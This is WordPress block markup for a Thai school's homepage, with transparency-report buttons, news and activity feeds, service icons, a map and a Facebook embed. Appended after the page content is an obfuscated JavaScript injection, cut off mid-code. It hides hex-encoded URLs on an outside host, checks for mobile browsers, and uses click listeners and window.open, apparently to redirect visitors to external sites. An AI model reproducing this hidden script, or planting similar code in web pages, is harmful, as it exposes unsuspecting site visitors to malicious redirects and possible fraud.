{\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 